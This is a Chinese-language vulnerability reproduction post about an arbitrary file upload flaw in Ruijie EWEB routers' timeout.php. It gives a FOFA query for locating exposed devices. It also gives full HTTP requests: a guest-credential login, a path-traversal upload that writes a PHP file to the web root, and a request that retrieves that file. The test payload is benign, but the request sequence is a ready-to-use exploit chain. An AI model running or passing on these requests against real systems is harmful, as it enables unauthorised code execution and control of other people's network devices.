锐捷 EWEB路由器 timeout.php任意文件上传漏洞
一、漏洞简介
锐捷睿易是锐捷网络面向商务市场的子品牌。拥有便捷的网络、交换机、路由器、无线、安全、云服务六大产品线,解决方案涵盖商业零售、酒店、kt、网吧、监控与安全、物流、仓储、制造。通过该漏洞,攻击者可以任意执行服务器端的代码,编写后门,获得服务器权限,进而控制整个web服务器。
二、影响版本
- 锐捷 EWEB路由器
三、资产测绘
- fofa
title=”锐捷网络-EWEB网管系统" - 特征
四、漏洞复现
获取cookie
POST /ddi/server/login.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Content-Length: 30
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
username=guest&password=guest?上传
POST /system_pi/timeout.php?a=upload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 62
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=dumk6rq561ie9udafp5eod39t7; path=/; HttpOnly; RUIJIEID=dumk6rq561ie9udafp5eod39t7
X-Requested-With: XMLHttpRequest
Connection: keep-alive
fileName=../tmp/html/233.php&mes=<?php echo 23149147841;?>访问上传结果
GET /233.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Connection: keep-alive
Cookie: RUIJIEID=dumk6rq561ie9udafp5eod39t7
Accept-Encoding: gzip, deflate, br© 版权声明
文章版权归作者所有,转载请标明出处。
THE END
暂无评论内容